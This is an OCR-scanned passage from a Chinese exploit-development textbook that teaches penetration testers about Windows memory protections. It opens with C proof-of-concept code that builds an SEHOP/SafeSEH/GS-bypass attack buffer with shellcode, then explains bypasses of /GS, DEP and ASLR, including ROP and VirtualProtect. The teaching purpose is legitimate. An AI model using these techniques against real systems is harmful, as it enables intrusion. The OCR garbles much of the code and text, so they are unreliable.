"\x3b\xad\x88\x6f\x3b\x32\x5b\xd4\xa3\xd0" 
"\x4e\x20\x4c\x4d\x1b\x89\x11\x6e\xf1\xcd" 
"\x2f\xed\xf0\xad\xcbh\xed\x70\xa8\x90\xa9" 
"\x69\xcO\x89\x5f\x8e\x77\xa9\x75\xed\x16" 
"\x39\x15\xdc\xbd\xb9\xbc\x20"; 


DWORD findFinalEH () { 


return ((DWORD) (GetModuleHandle ("ntdll.dll")) &OxFFFFOOOO)+0xBA87/5; 
//calc FinalEH 


int main(int argc, char *argv[]) { 


FILE *hFile; //file handle for writing to file 
UCHAR ucBuffer[4096]; //buffer used to build attack 
DWORD dwFEH = 0; //pointer to Final Exception Handler 


// Little banner 
printf("SEHOP Bypass PoC\n"); 
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// Calculate FEH 
dwFEH = (DWORD) findFinalEH (); 
if (dwFEH) { 


// FEH found 

printf("[1/3] Found final exception handler: 0x%08x\n", dwFEH) ; 
printf("[2/3] Building attack buffer ... "); 

memset (ucBuffer, '\x41',0x208); // 524 -4=520 = 0x208 of nop filler 
memcpy (&ucBuffer[0x208],"\xEB\x0D\x90\x90", 0x04) ; 

memcpy (&ucBuffer[0x20C], (void *) &nseh, 0x04); 

memcpy (&ucBuffer [0x210], (void *) &seh, 0x04); 


memset (&ucBuffer[0x214],'\x42',0x28); //nop filler 
memcpy (&ucBuf fer [0x23C], "\xEB\xOA\xFF\XFF\XFF\XFF\xFF\XxFE", 0x8) ; 
//jump 10 


memcpy (&ucBuffer[0x244], (void *)&dwFEH, 0x4); 

memcpy (&ucBuffer[0x248],shellcode, OxES) ; 

memset (&ucBuffer[0x32B],'\43',0xcd0) ; //nop filler 
printf ("done\n") ; 


printf("[3/3] Creating %s file ... \n",aragv[1]); 
hFile = fopen(argv[1],"wb"); 
if (hFile) 
{ 
fwrite((void *)ucBuffer, 0x1000,1,hFile); 
fclose(hFile); 
printf("Ok, you may attack with $sMn",argv[11); 
} 
} 
} 
下 面 使 用 Visual Studio 2010/2013 Express 命 令 行 工 具 (cD 编 译 这 个 程序 : 
pl sploit.c 
然后 运行 它 ， 创 建 攻击 绥 冲 区 : 


sploit.exe attack.bin 


接 下 来 将 该 文件 传 给 调试 硕 ， 看 看 会 及 生 什么 : 


C:\odbg110\ollydbg sploit.exe attack.bin 
注意 m: 确定 攻击 缓冲 区 的 偏 移 和 长 度 需 要 经 过 一 个 试验 和 试 错 的 过 
可 能 需要 在 调试 器 中 反复 局 动 程序 并 测试 ， 直 到 正确 为 止 。 


在 调试 左 中 运行 该 程序 后 (使 用 多 个 缓冲 区 大 小 和 栈 地 址 )， 成 功 构 建 了 所 需 的 
SEH 链 表 ， 如 图 13-23 所 示 。 请 注意 ， 第 一 个 记录 指 网 第 二 个 记录 ， 而 后 者 包 侣 系统 
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异常 处 理 程序 的 地 址 。 此 外 还 要 注意 ， 
shellcode( 在 最 终 的 异 币 处 理 程 序 的 下 面 )。 


第 川 部 分 de Geb DX ou 


39. 41414141 
-| SüSODODEB 


(6) 8B12F4?4| Pointer to next SEH record 


n SEH chain of main thread | o || © || 2s erase) BOL r4 Pointer to 
j a5 42424242 


Address | SE handler 
F446 
eG1i2ra74 ntdil. FrBBRB 


| &m| qax424242| 
bC 42424242 
3812F4780| FFFFOREB! 
IJgl2F47 FFFFFFFF|End of SEH chain 
47E. TTBORS?7B5|SE handler 
C 081562968 
& Siege? 


| C20033 
+86 SBF42474 


图 13-23 ”SEH 链 表 


最 后 ， 请 注意 在 程序 朋 沉 后 ， 己 可 以 控制 SEH 和 链表 了 (在 截屏 的 左 侧 显示 )。 
肝 ， 己 经 准备 好 继续 调试 或 者 直接 运行 该 漏洞 程序 了 了， 如 图 13-24 所 示 。 


if. 


Control Panel H ， ci 
onto! Panel Home View basic information about your computer 
ay Device Manager Windows edition 


Hp Remote settings Windows 7 Professional 


Hp System protection Copyright © 2009 Microsoft Corporation, All rights reserved, 


IN Visual Studio Command Prompt (2010) 


la] Calculator 
View Edit Help 


Cc \foodcl sploit.c 
Microsoft CR) 32-bit C/C++ Optimizing Compiler Version 16.68 
Copyright CC) Microsoft Corporation. All rights reserved. 


eploit.c 
Microsoft CR) Incremental Linker Version 16.06.36319 .@1 
Gopyright <C>) Microsoft Corporation. All rights reserved. 


Youtisploit.exe 
isploit.obhj 


| i 
| -Mfoo»sploit.exe attack.hin —— 一 一 一 一 一 一 一 一 一 
SEHOP Bypass PoC 

1731 Found final exception handler: 6x'77b@a875 
2/31 Building attack buffer ... done 

[3/3] Creating attack.bin File ... 

ok. you may attack with attack.bin 


G:sfoorfool.exe attack.bin 


| =\foo> Wi Change settings 


图 13-24 已 经 准备 就 绪 
可 以 看 到 ， 上 述 攻 击 行为 绕 过 了 /GS、SafeSEH 和 SEHOP 保 护 ! 


13.4.5 ”基于 堆栈 的 缓冲 区 浴 出 检测 (/GS) 


JMP short (EB) 指 令 通 过 NOP 雪 权 进 入 


m 


/GS 编译 选项 是 微软 的 堆栈 检测 仪 (Stack Canary) 概 念 的 具体 实现 ， 它 将 一 个 随 


新 的 函数 月 部 代码 如 下 所 示 : 


机 生成 的 秘密 值 (为 每 个 进程 调用 生成 一 次 ) 放 在 堆栈 上 保存 的 EBP 和 RETN 地 址 的 
上 方 。 然 后 当 函 数 返 回 时 ， 检 得 堆栈 检测 仪 的 值 是 人 否 已 被 修改 。 这 项 功能 是 在 Visual 
C++ 2003 中 引入 的 ， 而 且 最 初 在 默认 情况 下 是 关闭 的 。 
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push ebp 

mov ebp, esp 

sub esp, 24h ;space for local buffers and cookie 

move ax, dword ptr [vuln! security cookie] 

xor eax, ebp ;xor cookie with ebp 

mov dword ptr [ebp-4], eax ; store it at the bottom of stack frame 


新 的 函数 尾部 代码 如 下 所 示 : 


mov ecx, dword ptr [ebp-4] 

xor ecx, ebp ; see if either cookie or ebp changed 

call vuln! security check cookie (00401268) ; check it, address will vary 

"€ 

因此 可 看 出 ,上 面 的 代码 对 安全 cookie 与 EBP 进行 异 或 运算 , 然后 存放 在 堆栈 上 ， 
位 置 束 在 所 保存 的 EBP 的 上 和 面 ， 也 称 为 保存 的 帧 指针 (Saved Frame Pointer, SFP). 
稍 后 当 函 数 返 回 时 ， 取 出 安全 cookie， 再 次 与 EBP 进行 异 或 运算 ， 然 后 测试 是 否 仍 然 
与 系统 值 匹 配 。 这 看 上 去 很 简单 ， 但 稍 后 会 看 到 ， 仅 仅 这 样 做 还 是 不 够 的 。 

在 Visual C++ 2005 中 ， 做 软 将 /GS 编 详 选 项 改 为 默认 开局 ， 并 添加 了 其 他 一 些 功 
能 。 比 如 将 缓冲 区 移 到 栈 帧 中 的 更 高 地 址 处 ,以 及 移 到 其 他 敏感 变量 和 指针 的 下 方 ， 
这 样 会 减少 缓冲 区 洪 出 造成 的 本 地 破坏 。 

重要 的 一 点 是 要 明白 ，/GS 功 能 并 非 总 是 被 采用 。 出 于 优化 方面 的 考虑 ， 一 些 
情况 下 不 使 用 该 编 详 选 项 。 这 主要 取 雇 于 用 来 编 详 代 码 的 Visual Studio 厂 本 ， 下 面 列 
出 了 不 必 使 用 堆栈 检测 仪 的 情形 : 

e RBA AR RIP 
没有 局 用 优化 
使 用 naked 关 键 字 (C++) 标 识 的 函数 
国 数 的 放行 包 侣 内 联 汇编 代 码 
图 数 具 有 可 变 参数 列表 
Ze PCI ANN FAIRE 

在 Visual C++ 2005 SP1HP, A3 ASA S MARIRE. TETIGSITI IR AN ELA S. 
加 精准 ， 从 而 让 更 多 函数 得 到 保护 。 这 项 新 功能 是 根据 在 /GS 编译 后 的 代码 中 发 现 
的 多 处 安全 汤 洞 而 提出 的 。 要 使 用 这 项 新 功能 ， 请 包含 下 面 这 行 代码 : 

#pragma strict gs check (on) 

后 来 在 Visual Studio 2008 中 ， 将 函数 参数 的 一 份 副 本 移 到 了 栈 帧 项 部， 并 在 函 
数 返回 时 取 回 ， 这 使 得 原 参数 变 得 无 用 (如 来 个 窗 再 的 话 )。 到 了 Visual Studio 2015 
和 2017 版 本 时 ，/GS 对 应 的 保护 功能 更 加 强大 ， 夭 认 能 保护 大 多 数 函 数 。 
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13.4.6” 绕 过 /GS 
绠 过 /GS 保护 机 制 的 方法 有 多 种 ， 如 下 所 述 。 
1. 猜测 cookie 值 


这 并 非 听 起 来 那么 首 狂 。Skape 曾 经 讨论 并 且 证 明 /GS 保 护 机 制 使 用 了 几 个 较 弱 
的 业 源 ， 攻 击 者 可 对 其 进行 计算 并 使 用 它们 来 预测 (或 猜测 )cookie 值 ; 但 这 种 方法 只 
适用 于 针对 本 地 系统 的 攻击 (攻击 者 拥有 机 费 的 访问 权限 )。 


2. midi gatas 


(EAA REPRIALIN, AED OTRAS Aa ERATE ET, PR Avptr. BAJ 
非 针 对 /GS 控制 的 实现 , 但 是 一 种 避免 安全 cookie 检 查 的 稼 用 技术 是 利用 被 过 早 删除 
的 C++ 类 的 实例 化 对 象 ， 这 是 因为 存在 释放 后 重用 (Use-After-Free，UAF) 汤 将 。 石 
可 以 在 删除 对 象 之 后 引发 一 次 新 的 内 存 分 配 ， 通 过 仔细 选择 与 被 删除 对 象 相 匹配 的 
长 度 ， 便 可 在 该 位 置 香 用 攻击 者 目 己 的 数据 。 奢 对 此 对 象 的 引用 发 生 在 其 被 蔡 换 之 
后 ， 攻 击 者 就 可 以 控制 vptr。 通 过 使 用 corelanc0d3r 罗 DEPS(CDOM Element Property 
Spray，DOM 元 系 属性 顺 射 ) 之 类 的 技术 ,攻击 者 可 在 已 知 位 置 创建 假 的 虚 函 数 表 。 
当 解 除 对 vptr +offset 的 引用 时 ， 它 将 调用 攻击 者 所 控制 的 值 。 


3. 用 选中 的 值 蔡 换 cookie 


cookie 存 放 于 内 存 的 .data 段 ， 由 于 需要 在 运行 时 计算 并 将 结 采 写 入 ， 因 此 该 数 
据 段 是 可 写 的 。 如 果 ( 只 是 假设 ) 拥 有 写 任意 内 存 的 权限 (比如 通过 另 一 次 漏洞 攻击 获 
得 )， 那 么 可 以 重 写 cookie 的 值 ， 然 后 在 覆盖 堆栈 时 使 用 这 个 新 值 。 


4. 覆盖 SEH 记录 


实际 上 , /GS 保护 机 制 并 没有 保护 存放 在 堆栈 上 的 SEH 结 构 。 因 此 ， 如 果 能 写 入 
足够 的 数据 来 履 辣 SEH 记 录 ， 并 在 函数 尾部 和 cookie 检 栓 之 前 触 友 异 笛 ， 那 么 可 以 
控制 程序 的 执行 流程 。 当 然 ， 微 软 已 经 实现 SafeSEH 来 保护 堆栈 上 的 SEH 记 录 ， 但 
正如 下 面 将 看 到 的 ， 该 机 制 同样 存在 漏洞。 一 时 专 一 事 ， 先 来 看 一 下 如 何 用 这 种 绕 
过 SafeSEH 的 方法 来 绕 过 /GS。 稍 后 ， 可 以 观察 到 ， 在 试图 绕 过 SEHOP 时 ， 也 将 同时 
绕 过 /GS 。 


13.4.7 HERI 


WA, RRE DA EDU. FACE“ ye ER, KAT 
P3 RPE BUSI AE IY n] f AER ETERS VIL FE ERAT. fEWindows XP 
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SP2 及 以 后 的 版 本 中 ， 微 软 实现 了 一 组 堆 保 护 机 制 来 防止 这 种 类 型 的 攻击 。 
e 安全 移 除 (Safe Unlinking): 在 进行 移 除 前 ， 操 作 系 统 会 验证 辐 前 和 回 后 指针 
指 回 的 是 相同 的 块 。 
e 推 元 数据 cookie(Heap Metadata cookie): 在 堆 块 首部 存储 一 字 贡 的 cookie， 在 
从 衬 采 列表 中 移 除 之 前 先 检 和 奏 该 值 。 后 来 在 Windows Vista 中 ， 微 软 对 几 个 
关键 的 首部 字段 增加 了 异 或 加 密 保 护 ， 并 在 使 用 前 进行 检查 ， 以 防止 算 改 。 
主要 从 Windows Vista 和 Windows Server 2008 开 始 ( 昌 然 之 前 某 些 Windows 版 本 
也 同样 支 持 )， 系 统 使 用 低 雄 片 堆 (Low Fragmentation Heap，LFH) 对 内 存 分 配 请 求 提 
供 服 务 。 在 用 户 空间 中 ， 因 为 快 表 (Lookaside List) 存 在 单 链 表 指 针 伪 造 和 缺少 安全 
cookie 等 安全 问题 , LFH 已 经 取代 原先 被 称 为 快 表 的 前 尊 堆 分 配 顷 。LFH 可 按 一 定 的 
条 件 进 行内 存 分 配 ， 并 更 有 效 地 避免 碎片 。 尽 管 存在 差异 ， 但 当 18 个 相同 大 小 的 连 
续 分 配 请 求 到 达 时 ， 通 常会 触发 LFH。 可 以 对 每 个 分 块头 部 的 前 4 个 字 节 进行 编码 以 
防止 堆 溢 出 ， 就 像 安全 cookie 那 样 。 请 务必 看 一 下 Chris Valasek 在 LFH 方 面 所 做 的 研 
jt TE. 
fE Windows 8 以 及 更 新 的 版 本 中 还 有 一 些 额外 的 扒 保 护 机 制 和 C++ 面 问 对 象 保 
护 机 制 ， 比 如 使 用 封装 优化 来 移 除 虚 函 数 调 用 相关 的 间接 寻 址 。 男 外 ， 在 
MSHTML.dll 中 添加 了 vtguard 虚 阴 数 表 保 护 , 它 的 工作 原理 是 在 C++ 虚 冰 数 表 中 放 入 
一 个 未 知 入 口 ， 并 在 调用 虚 函 数 之 前 验证 对 应 的 虚 函 数 表 是 否 有 效 。 某 些 情况 下 使 
用 保护 页 也 有 神 荔 ， 当 渔 出 到 达 保 护 页 面 时 ， 会 触 肥 一 个 异 单 。 详 情 可 参见 “扩展 
|j" rHKen Johnson 和 Matt Miller] 78 HF. 


13.5 ”本章 小 结 


本 章 所 展示 的 技术 ， 可 以 帮助 渗透 测试 团队 了 解 通 过 栈 洲 出 进行 的 基本 
Windows 漏 洞 攻击 方法 ， 这 些 方法 能 绕 过 简单 的 反 制 措施 。 从 本 章 可 以 了 解 到 ， 微 
软 操作 系统 中 存在 很 多 内 存 保护 措施 ， 具 体 取 决 于 选择 的 编译 选项 以 及 其 他 因素 。 
每 种 内 存 保护 措施 都 会 给 渗透 测试 团队 带 来 新 的 挑战 ， 于 是 出 现 了 “ 猫 鼠 游戏 ” T 
续 对 抗 。EMET 提 供 的 保护 有 助 于 阻止 定型 攻击 (Canned Exploit)， 不 过 ， 如 书 中 所 
述 ， 经 验 丰 富 且 技术 高 超 的 渗透 测试 团队 可 以 对 攻击 进行 定制 ， 以 规避 已 知 的 诸多 
安全 控制 措施 。 下 一 章 将 介绍 高 级 的 Windows 漏 洞 攻击 以 及 相关 的 攻击 反 制 措施 。 
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第 14 章 高 级 的 Windows 漏洞 攻击 


草 介 绍 了 基本 的 Windows 漏 调 攻 击 技术 ， 这 些 攻击 乾 兰 返回 的 指针 、 吉 开 
SEH, p 与 设法 绕 过 SafeSEH 和 SEHOP 相 关 的 简单 反 制 技术 。 近 年 来 ， 漏 洞 攻击 程 
序 编写 者 一 直 在 利用 返回 导 癌 编程 Returm-Oriented Programming, ROPA E B 
件数 据 执行 保护 (Data Execution Prevention，DEP) 等 内 存 保 护 措施 。 市 面 上 已 有 包括 
微软 的 增强 防御 体验 工具 包 (Enhanced Mitigation Experience Toolkit，EMET) 在 内 的 
多 种 反 制 方式 来 阻止 ROP 生 效 。EMET 的 生命 周期 于 2018 年 7 月 终止 ， 不 过 ，EMET 
TA B) gor] Windows Defender Exploit Guard 继 续 存 在 。2017 年 10 月 ，Windows 10 
Fall Creators Update 推 出 了 Exploit Guard。 其 他 第 见 的 反 制 技术 还 包括 地 址 空间 布局 
随机 化 (Address Space Layout Randomization, ASLR). 42H73 (Control Flow 
Guard, CFG), ba }Edsolated Heap) 和 MemGC 等 。 


本 章 涵盖 的 主题 如 下 : 
e 利用 ROP 绕 过 硬件 DEP 
e 使 用 基于 浏览 器 的 内 存 泄漏 绕 过 ASLR 


14.1 DEP 


数据 执行 保护 (Data Execution Prevention，DEP) 旨 在 阻止 处 于 堆 、 堆 栈 或 其 他 数 
据 内 存 区 中 的 代码 的 执行 。 这 一 直 都 是 操作 系统 的 目标 ， 但 在 2004 征 之前， 硬件 并 
不 文 持 DEP。2004 年 ，AMD 推 出 了 带 NX 位 的 CPU， 首 次 文 持 用 硬件 识别 内 存 页 是 
侍 可 执行 ， 并 相应 地 采取 措施 。Intel 罕 接 看 推出 了 XD 功能 来 完成 相同 的 工作 。 

从 Windows XP SP2 开 始 ，Windows 已 经 可 以 使 用 NXAXD 位 。 应 用 程序 可 以 通过 
/NXCOMPAT 标 志 进 行 链接 以 启用 硬件 DEP; 具体 将 取决 于 操作 系统 版 本 ， 以 及 与 
内 存 权 限 和 保护 相关 的 各 个 重要 函数 是 人 否 文 持 。 有 三 种 主要 的 漏洞 攻击 反 制 关 型 : 

e 应 用 程序 可 选择 性 (Application Optional) 

e 探 作 系统 控制 措施 (OS Controls) 

e 编 详 需 控制 措施 (Compiler Controls) 

“应 用 程序 可 选择 性 ”类 型 不 如 其 他 两 种 反 制 类 型 有 效 ， 因 为 在 编译 应 用 程序 
时 ， 可 以 不 选择 反 制 功能 的 选项 。 另 外 ， 如 果 有 人 使 用 Hex 编 辑 器 更 改 重 要 标志 位 ， 
反 制 也 会 失效 。 而 且 ， 从 Windows 7 开始 ， 和 微软 不 再 文 持 NtSetInformationProcess 和 
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SetProcessSDEPPolicy 这 两 个 重要 函数 ， 以 防止 应 用 程序 上 自行 选择 是 否 参与 DEP。 通 
第 这 些 函 数 与 研究 人 员 Skape 和 Skywing 开 发 的 技术 一 起 ， 被 用 于 在 运行 的 进程 上 禁 
用 DEP。 

“操作 系统 控制 措施 ”类 型 包括 由 操作 系统 文 持 的 那些 反 制 技术 ， 其 中 一 些 是 
可 配置 的 ， 如 DEP。 系 统管 理 员 可 以 选择 哪些 第 三 方 应 用 程序 参与 DEP， 但 不 允许 
由 应 用 程序 自行 决定 。“ 操 作 系统 控制 措施 ”类 型 的 例子 有 ASLR， 从 Windows Vista 
开始 ， 会 默认 局 用 ASLR; ASLR 对 内 和 存 中 的 段 (包括 堆 和 堆栈 ) 进 行 随机 化 处 理 。 

“编译 器 控制 措施 ”类 型 的 保护 包括 安全 cookie、 基 址 重 定 位 (Rebasing) 和 CFG 
等 。 如 果 在 编译 库 时 未 使 用 /DYNAMICBASE 选 项 ， 那 么 每 次 应 用 程序 加 载 库 时 ， 
会 将 请 求 映 射 到 相同 的 静态 内 存 地 址 。 微 软 的 EMET 和 Windows Defender Exploit 
Guard LE mF HForce ASLRJ& i1] BES 55 XX IMD) BE. 

Js til] Fe IS BIA S A. EAN a EUN EE id» HUC ASA TU a EREA Be 
的 重点 ， 所 以 不 再 过 多 介绍 。 本 章 的 重点 是 如 何 突破 DEP 和 ASLR， 对 其 他 反 制 技术 
介绍 较 少 。 在 必要 时 ， 也 会 介绍 隔离 堆 和 MemGC。 


14.2 ASLR 


地 址 空间 布局 随机 化 (Address Space Layout Randomization，ASLR) 技 术 的 作用 
是 在 进程 使 用 的 内 存 寻 址 中 引入 随机 性 ( 箭 )。 内 存 地 址 在 不 断 变 化 ， 这 会 让 攻击 变 
得 更 加 困难 。 微 软 在 Windows Vista 及 后 续 的 操作 系统 中 正式 引入 了 ASLR 技 术 。 应 
用 程序 和 DLL 可 选用 DYNAMICBASE 链 接 标 志 ， 系 统 会 对 认 选 用 该 标志 ， 确 保 加 
载 的 模块 也 能 够 得 益 于 随机 化 。 在 不 同 的 Windows 版 本 上 ， 燃 值 是 不 同 的 。64 位 的 
Windows 10 系 统 ， 相 比 首 次 引入 ASLR 的 32 位 的 Windows Vista 系 统 能 更 好 地 支持 随 
机 化 , 这 一 点 很 容易 理解 。 实际 上 , 64 位 的 Windows 版 本 可 从 高 炉 ASLR(High Entropy 
ASLR，HEASLR) 中 获 益 ，HEASLR 极 大 地 增加 了 可 用 的 虚拟 地 址 空间 范围 。 假 设 
房间 里 有 1000 把 椅子 , Alice 可 以 任意 选择 坐 在 其 中 一 把 椅子 上 。 当 每 次 返回 房间 时 ， 
也 都 可 从 1000 个 可 用 座位 中 选择 一 个 。 只 要 选 座 是 随机 的 ， 他 人 猜 中 Alice 举 在 哪里 
的 概率 只 有 干 分 之 一 。 这 是 一 个 32 位 操作 系统 的 示例 。 接 着 , 假设 进入 一 个 有 50 000 
个 可 用 座位 的 体育 场 。Alice 仍 然 只 需要 一 个 座位 ， 由 于 座位 数量 更 多 ，Alice 的 位 置 
将 更 难 被 狂 到 。 虽 然 这 个 例子 不 那么 准确 ， 但 也 切中 要 后 。 

在 随机 化 地 址 时 ， 内 存 中 一 些 段 的 燃 值 更 低 ， 在 32 位 的 应 用 程序 和 操作 系统 中 
尤其 如 此 。 这 样 ， 进 程 可 能 成 为 蛋 力 攻击 的 牺牲 品 。 这 取决 于 各 种 条 件 ， 如 笑 试 友 
起 攻击 时 进程 是 否 崩 淡 。 内 核 中 的 随机 化 ， 如 驱动 程序 寻 址 和 硬件 抽象 层 (Hardware 
Abstraction Layer, HAI) 的 历史 更 短 。Windows 8 中 引入 了 局 燃 HEASLR, Ken Johnson 
和 Matt Miller 在 美国 拉 斯 维 加 斯 举办 的 2012 届 黑 帽 大 会 上 进行 了 产品 演示 。 高 炉 
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HEASLR 极 大 增加 了 燃 池 中 的 位 数 ， 还 使 用 了 喷 冉 搁 术 ， 使 预测 变 得 更 加 困难 。 在 
2016 年 举办 的 黑 帽 大 会 上 ，Matt Miller 和 David Weston 及 表 了 题 为 “Windows 10 防 御 
改善 ”的 演讲 。 可 在 本 草 的 “扩展 阅读 ”中 找到 此 次 演讲 的 链接 。 


14.3 EMET 和 Windows Defender Exploit Guard 


做 软 提 供用 于 绥 解 攻击 的 增强 防御 体验 工具 包 (Enhanced Mitigation Experience 
Toolkit，EMET) 已 经 有 一 段 时 间 了 。 撰 写本 书 之 时 ， 最 稳定 的 厂 本 是 EMET 5.5x. 
EMET 中 的 或 EMET 所 管理 的 攻击 缓解 例子 包括 : 导出 地 址 表 访问 过 滤 (Export 
Address Table Access Filtering，EAT/EAT+)、 对 堆栈 交换 指令 的 保护 (Stack Pivot 
Protection, SPP). iXf£J(Deep Hooks)、ASLR 改 进 、SEHOP 支 持 、 字 体 保 护 、 额 外 的 
ROP 保 护 以 及 其 他 几 种 控制 措施 ， 这 些 都 给 恶 童 黑客 市 来 了 额外 挑战 ， 恶 音 攻 击 者 
必须 使 用 已 知 的 技术 或 新 技术 来 绕 过 或 共用 这 些 控制 指 施 。 相 比 之 前 的 版 本 ， 如 今 
的 EMET 改 进 了 管理 功能 : 可 以 方便 地 选择 要 保护 的 应 用 程序 ， 在 更 细 粒 度 上 控制 
每 个 应 用 软件 的 攻击 防御 。Windows 7/8 目 融 很 多 EMET 控 制 ， 但 需要 进行 菜 种 程度 
的 配置 ， 通 常 涉 及 与 注册 表 的 交互 。EMET 提 供 了 更 简单 的 方法 ， 可 以 在 更 细 粒 度 
上 管理 这 些 控制 ， 而 其 他 一 些 非 目 市 的 控件 则 需要 通过 安 疹 EMET 实 现 控 制 指 施 。 

敏 软 在 目 己 的 安全 情报 报告 的 第 12 疮 中 有 一 个 示例 ， 针 对 未 打 补 丁 存 在 漏洞 的 
Windows XP SP3 系 统 及 动 了 184 次 攻击 ， 其 中 181 次 获得 成 功 。 然 后 使 用 某 一 版 本 的 
EMET， 再 次 运行 攻击 测试 ， 友 现 其 中 的 163 次 攻击 个 EMET 阻 止 。 

微软 宣布 ， EMET 的 生命 期 在 延长 18 个 月 后 ， 于 2018 年 7 月 结束 。 很 多 安全 社区 
对 此 表示 失望 ， 微 软 听取 了 意见 并 宣布 EMET 将 借助 Windows Defender 继 续 存 在 下 
X. Windows Defender Exploit Guard 文 持 EMET 中 的 大 多 数控 制 指 施 。 截至 撰写 本 书 
上 时， 业界 担忧 的 问题 是 ， 人 和 做 软 仅 从 2017 年 发 布 的 Windows 10 Fall Creators Update 开 
始 提供 Exploit Guard。 这 就 意味 着 ， 在 2018 年 7 月 后 ，Windows 7/8 不 再 继续 文 持 使 用 
EMET. 


14.4 S&E&XASLR 


Zeit ASLR Ih Be fia] 5.77 5X oe X [n] $1 A fi A/D YNAMICBA SE 29 Eii 391 [15] HIS E89 
块 中 。 第 13 章 讨论 的 Mona 工 具有 一 个 选项 可 用 于 列 出 所 有 没有 链接 ASLR 的 模块 : 


!Imonanoaslr 


当 针 对 wsshd.exe 进 程 运行 mona 命 令 时 ， 如 图 14-1 所 示 的 表格 将 显示 在 日 志 窗 
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口中 。 


MBADFHAD Mo aslr & no rebase module 
HBAüDFHBD | [+] Generat ing module info rakie: hang on... 
BHBADFHHD E rocessing modu 


HHR DFHHD 一 Done. Let's ck. je roll. 

ABADFAAD | 一 一 一 一 一 一 一 一 一 一 一 一 一 SS SSS SS SS SS SSS SSS SS SS SS SSS SS SS SS SS SS SS SS SSS SS SS SSS 
WBaDFHHD| Module info : 

ÖBADFOÖD | ———— 一 一 一 一 一 一 一 一 一 一 一 一 -一 一 一 一 一 一 一 一 一 一 一 一 -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
me pes Base : Top ! Size : Rebase : SafeSEH : ASLR «+: NaCompat : OS Dll ; EIE Hodulename & Path 
HBADFAAD oe eee | BHx7c396HB8H | eee bene | False | True | False i False |! False | 7.16. TE: 4 [HSUCR71.d111 : 
ABADFAAD x656e8RRH | AxASAFLAAH | AxAAALLAAA | False i! False | False 1 False | True | 2.351.888 [ct13d32.d111 CG:" 
GBADFHSD OTC 40000 i Bx'7c243BBB 000103008 i False i True : False | False | False i 311013077 0 [MFG71.DLL] «4C 
ABADFAAD| HxHHdHBHBHH 46648 4668 44688 4608 False True | False | False |! False | 1.6.6.1 (Uxwpsetts.exe] (C= 
cig ee s | 8x1 6666088 6x1 6036008 6x86836808 False True E False P False i False i . a- [xsetup. dlll (6: NPros 
HBADFORD 


Action took 6:66:66 .463808 


图 14-1 在 日 志 窗 口中 显示 表格 


可 以 看 出 ，MSVCR71.dll 模 块 并 没有 受到 ASLR 保 护 。 在 后 面 绕 过 DEP 的 例子 中 
将 利用 这 一 点 。 屏 幕 显 示 结 吉 果 与 使 用 的 Mona 版 本 以 及 其 他 因素 (例如 ， Wal 1A ETATS 
WH)A XK. 


注意 : 这 种 方法 并 没有 真正 绕 过 ASLR， 但 就 目前 而 言 ， 只 要 仍 有 开发 人 
员 在 编译 模块 中 不 使 用 /DYNAMICBASE 选 项 , 这 就 是 一 种 能 “ 避 开 ”ASLR 
的 可 行 方法 。 当 然 这 是 最 简便 的 方式 。 有 了 时， 可 以 使 用 部 分 返回 指针 被 盖 
方法 绕 过 ASLR， 特 别 是 在 32 位 进程 中 ， 尤 其 如 此 。 


突破 ASLR 的 一 种 更 复杂 但 有 效 的 方法 是 找 出 泄露 的 内 存 地 址 信息 。 如 有 果 已 
加 载 模块 中 的 某 个 已 知 对 象 的 地 址 信息 可 被 获知 ， 那 么 如 图 14-2 所 示 ， 用 全 地 址 
减 去 已 知 的 相对 虚拟 地 址 偏 移 便 可 以 确定 被 午 定 位 的 模块 的 加 载 基 址 。 有 了 这 些 
信息 ， 就 可 以 动态 生成 ROP 链 。 和 可 后 将 介绍 针对 Internet Explorer 11 的 释放 后 重用 
(Use-after-Free，UAF) 内 和 存 地 址 信息 泄露 漏 将 ， 这 将 允许 完全 绕 开 ASLR。 和 释放 后 和 车 
用 缺陷 CBug) 通 党 是 因为 过 早 地 释放 C++ 对 象 造成 的 。 如 果 仍 存在 对 已 释放 对 象 的 引 
用 ， 则 容易 通过 给 释放 位 置 分 配 恶 意 、 受 控 的 对 象 来 肥 起 攻击 。 


0x74c20000 0x76390000 


RVA fmt? ] BEN 
芭 址 +301624h 0x76691624 ptrleak fm) (.75651624 
code —0x301624 (RVA) 
code 
code 0x76390000 — 基 址 
idata 


data 
0x768CC85C data 


图 14-2 ”内 存 地 址 信息 泄露 


0x7515C85C 
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14.5 £i DEPAIASLR 


为 演示 如 何 红 过 DEP， 我 们 将 使 用 第 13 间 中 用 过 的 ProSSHD v1.2. 
14.5.1 VirtualProtecte% 24 


ARA SERE m BEAT HER HE PINS, nT GE FA Virtual Alloc 5k VirtualProtect 
PBK NAFIKA tid AAT AT. VirtualProtectRALAYAPIAU FATA: 
BOOL WINAPI VirtualProtect ( 
| in LPVOID lpAddress, 
| in SIZE T dwSize, 
= in DWORD flNewProtect, 
= out PDWORD lpflOldProtect 
) ; 


因此 ， 需 要 将 以 下 参数 压 入 栈 ， 从 而 调用 VirtualProtect0 函 数 : 

e lpAddress 被 标记 为 可 执行 的 页 面 区域 的 基 址 。 

e dwSize 被 标记 为 可 执行 的 代码 区 域 大 小 (单位 为 字 节 )， 需 要 留 有 余地 以 备 打 - 
展 shellcode。 但 因为 系统 其 实 是 根据 内 存 地 址 以 页 面 为 单位 进行 标记 的 ， 所 


以 此 处 可 设 成 1。 
e flNewProtect 是 新 的 保护 选项 ，PAGE EXECUTE READWRITE 属 性 对 应 的 
730x00000040. 


e — 问 存 放 旧 的 保护 选项 代码 的 地 址 。 
使 用 下 面 的 命令 ， 可 确定 VirtualProtect0 函 数 在 MSVCR71.dll 内 部 的 地 址 : 


Imona ropfunc MSVCR/1.dll 


该 命令 的 输出 结果 存放 在 ropfonc.txt 文 件 中 , 可 在 为 Mona 配 置 使 用 的 输出 文件 夹 中 
找到 . 


14.5.2 ROP 


思考 一 个 问题 。 如 果 不 能 执行 堆栈 上 的 代码 ， 攻 击 者 会 怎么 办 ? 是 在 其 他 地 方 
执行 代码 吗 ? 但 是 ， 在 哪里 执行 呢 ? 在 现 有 的 经 过 链接 的 模块 中 有 许多 小 块 的 代码 
片段 ， 它 们 后 面 跟 看 RETN 指 令 。 程 序 可 能 执行 这 些 代 码 序 列 ， 也 可 能 不 执行 。 假 
设 要 使 用 缓冲 区 溢出 来 控制 进程 。 如 果 在 这 些 所 需 的 代码 序列 上 布置 一 系列 指针 ， 
